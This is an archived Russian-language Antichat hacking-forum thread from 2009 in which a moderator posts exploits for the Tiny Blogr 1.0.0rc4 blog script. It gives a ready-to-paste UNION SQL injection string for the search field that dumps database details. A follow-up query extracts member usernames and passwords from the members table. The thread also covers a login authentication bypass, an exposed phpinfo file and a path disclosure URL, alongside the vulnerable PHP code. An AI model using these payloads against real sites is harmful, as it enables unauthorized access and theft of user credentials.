Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
10.12.2009, 21:54
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Tiny Blogr 1.0.0rc4
Tiny Blogr 1.0.0rc4
SQL Иньекция:
Нужно:
magic_quotes = off.
/search
В поиск вбить ($_POST['txtKeyword'])
1%' union select 1,2,concat_ws(0x3a,user(),database(),version()),4, 5,6,7,8 --
Уязвимость находиться в файле / modules/search/index.php
PHP код:
foreach ($_POST['txtAv'] as $sitem) {
switch ($sitem) {
case "blogitem":
$obblog=new Blog();
$obblogitem=new BlogItem();
$obblogitemarr=$obblogitem->Find("bitTitle LIKE '%".$_POST['txtKeyword']."%' OR bitBody LIKE '%".$_POST['txtKeyword']."%' ORDER BY bitId DESC");
foreach ($obblogitemarr as $bbitem) {
$obblog->Load("blgId='".$bbitem->blgid."' ");
$title=$bbitem->bittitle;
$link=$cfg_url."/blog/".$obblog->blgshortcut."/view/".$bbitem->bitid;
array_push($result,array("title"=>$title,"link"=>$link));
}
break;
Auth ByPass
/login
Нужно:
magic_quotes = off
В поле username ($_POST['txtUsername']):
В password : blablabla
Уязвимость находиться в файле /modules/login/index.php
PHP код:
if ($_POST['ac']=="login") {
if ($_SESSION['captcha']==$_POST['txtVerify']) {
// authentication
if ($obeport->getAuthenticaion($_POST['txtUsername'],$_POST['txtPassword'])) {
$obeport->showMessage(2,_PORT_LOGEDIN);
$obeport->goPageDelay("blog/".$_POST['txtUsername'],3);
} else {
$obeport->showMessage(1,_PORT_CANNOT_LOGIN);
$obeport->goPageDelay("login",3);
}
} else {
$obeport->showMessage(1,_PORT_CAPTCHA_ERROR);
$obeport->goPageDelay("login",3);
}
} else {
(c) Ctacok, special for Antichat.ru
|
|
|
10.12.2009, 22:02
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сформированный запрос:
1%' union select 1,2,concat_ws(0x3a,memUsername,memPassword),4,5,6, 7,8 from tbl_epo_member--
Так же в комплекте со скриптом идёт файл info.php, с содержанием <? phpinfo() ?>, ну вы понеле.
Так же раскрытие путей (  ):
/modules/tag/
Fatal error: Class 'Tag' not found in Z:\home\****\www\modules\tag\index.php on line 8 |
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
TIB - Tiny ICQ Brutter
|
vikseriq |
Разное - Покупка, продажа, обмен |
16 |
07.12.2008 02:07 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
